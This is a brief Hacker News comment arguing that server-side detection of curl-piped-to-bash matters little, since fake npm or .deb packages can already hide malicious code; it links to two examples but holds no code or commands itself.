The bash detection is clever but I think its a solution to a problem that doesn't exist.. Its already very easy to install hide malicious code in plain sight, why go to all this trouble to detect if the user is piping to bash?

For example, see how easy it is to publish a fake npm package or a .deb package:

https://hackernoon.com/im-harvesting-credit-card-numbers-and...

https://github.com/ChaitanyaHaritash/kimi




Applications are open for YC Summer 2019

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: